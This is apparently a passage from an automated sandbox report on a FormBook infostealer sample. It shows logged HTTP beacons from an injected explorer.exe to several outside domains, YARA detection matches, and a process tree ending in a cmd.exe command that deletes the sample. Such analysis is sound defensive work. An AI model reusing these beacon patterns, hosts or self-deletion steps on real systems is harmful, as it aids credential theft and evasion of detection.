                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.449764198.185.159.14480C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:27.964210987 CEST3668OUTGET /p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.anewdistraction.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:28.103754044 CEST3669INHTTP/1.1 400 Bad Request
                                                        Cache-Control: no-cache, must-revalidate
                                                        Content-Length: 77564
                                                        Content-Type: text/html; charset=UTF-8
                                                        Date: Thu, 10 Jun 2021 15:59:28 UTC
                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                        Pragma: no-cache
                                                        Server: Squarespace
                                                        X-Contextid: XwfQswqc/7LuuUOoE
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.44976778.31.67.9180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:33.260176897 CEST3727OUTGET /p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.cleanxcare.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:33.313033104 CEST3728INHTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Content-Length: 707
                                                        Date: Thu, 10 Jun 2021 15:59:33 GMT
                                                        Location: https://www.cleanxcare.com/p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        Vary: User-Agent
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.449768151.106.118.7580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:39.007769108 CEST3729OUTGET /p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.biztekno.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:41.822793961 CEST3730INHTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        x-powered-by: PHP/7.4.20
                                                        set-cookie: weather_location=unknown; expires=Sat, 10-Jul-2021 15:59:39 GMT; Max-Age=2591999; path=/
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        content-type: text/html; charset=UTF-8
                                                        x-redirect-by: WordPress
                                                        location: http://biztekno.com/p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp
                                                        x-litespeed-cache: miss
                                                        content-length: 0
                                                        date: Thu, 10 Jun 2021 15:59:41 GMT
                                                        server: LiteSpeed
                                                        vary: User-Agent


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.449769163.43.122.11980C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:45.423042059 CEST3732OUTGET /p2io/?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.69-1hn7uc.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:45.760066986 CEST3732INHTTP/1.1 302 Found
                                                        Date: Thu, 10 Jun 2021 15:59:44 GMT
                                                        Server: Apache/2.2.13 (Unix)
                                                        Location: http://www.69-1hn7uc.net/notfound?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&YluDM=Ofc4YV0pThsp
                                                        Content-Length: 314
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36 39 2d 31 68 6e 37 75 63 2e 6e 65 74 2f 6e 6f 74 66 6f 75 6e 64 3f 78 4e 36 78 3d 56 39 51 36 59 4e 45 73 6d 55 54 67 75 6e 31 78 36 6a 38 52 56 52 74 30 75 64 50 43 79 6b 4b 45 4e 2f 7a 4b 2b 49 39 2f 58 43 7a 65 4f 43 36 35 30 6f 33 6e 6f 58 51 68 62 64 52 46 78 50 55 6c 59 72 62 44 26 61 6d 70 3b 59 6c 75 44 4d 3d 4f 66 63 34 59 56 30 70 54 68 73 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.69-1hn7uc.net/notfound?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&amp;YluDM=Ofc4YV0pThsp">here</a>.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.449770104.21.65.780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:50.897965908 CEST3734OUTGET /p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.cyrilgraze.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:50.956264973 CEST3735INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 10 Jun 2021 15:59:50 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 10 Jun 2021 16:59:50 GMT
                                                        Location: https://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp
                                                        cf-request-id: 0a983fcc9400004a5cd3af6000000001
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=wxDs3yH1Q0jpz%2FQwU22N2J90efSFmemicGmwvxLuWvDu0xC%2B%2FvwdkRc7EMM122xuc%2FufIqiNWH%2Fbb7H8jCiF0PEAjzqwvcdeeWzg2jpurI0DOf6h6pBSRaK95iLDrAUd"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 65d3cf27582a4a5c-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.449771192.169.223.1380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:56.257801056 CEST3735OUTGET /p2io/?xN6x=r2GsjHfGgcaZI4XPmfqM84hqAY3LnZYXU2G/Xsttb0tqrt8DFa/RFFebhWMTMoil/lgU&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.centergolosinas.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:56.448759079 CEST3736INHTTP/1.1 302 Found
                                                        Connection: close
                                                        Pragma: no-cache
                                                        cache-control: no-cache
                                                        Location: /p2io/?xN6x=r2GsjHfGgcaZI4XPmfqM84hqAY3LnZYXU2G/Xsttb0tqrt8DFa/RFFebhWMTMoil/lgU&YluDM=Ofc4YV0pThsp


                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: SKlGhwkzTi.exe PID: 6896 Parent PID: 6020

                                                        General

                                                        Start time:17:57:55
                                                        Start date:10/06/2021
                                                        Path:C:\Users\user\Desktop\SKlGhwkzTi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\SKlGhwkzTi.exe'
                                                        Imagebase:0x940000
                                                        File size:782336 bytes
                                                        MD5 hash:8252E0BD8E579259CC18CEAE0C5C6D64
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Analysis Process: SKlGhwkzTi.exe PID: 4484 Parent PID: 6896

                                                        General

                                                        Start time:17:58:07
                                                        Start date:10/06/2021
                                                        Path:C:\Users\user\Desktop\SKlGhwkzTi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\SKlGhwkzTi.exe
                                                        Imagebase:0xe00000
                                                        File size:782336 bytes
                                                        MD5 hash:8252E0BD8E579259CC18CEAE0C5C6D64
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 4484

                                                        General

                                                        Start time:17:58:09
                                                        Start date:10/06/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: help.exe PID: 6296 Parent PID: 4484

                                                        General

                                                        Start time:17:58:45
                                                        Start date:10/06/2021
                                                        Path:C:\Windows\SysWOW64\help.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\help.exe
                                                        Imagebase:0xf90000
                                                        File size:10240 bytes
                                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        Analysis Process: cmd.exe PID: 7140 Parent PID: 6296

                                                        General

                                                        Start time:17:58:47
                                                        Start date:10/06/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe'
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 6932 Parent PID: 7140

                                                        General

                                                        Start time:17:58:48
                                                        Start date:10/06/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >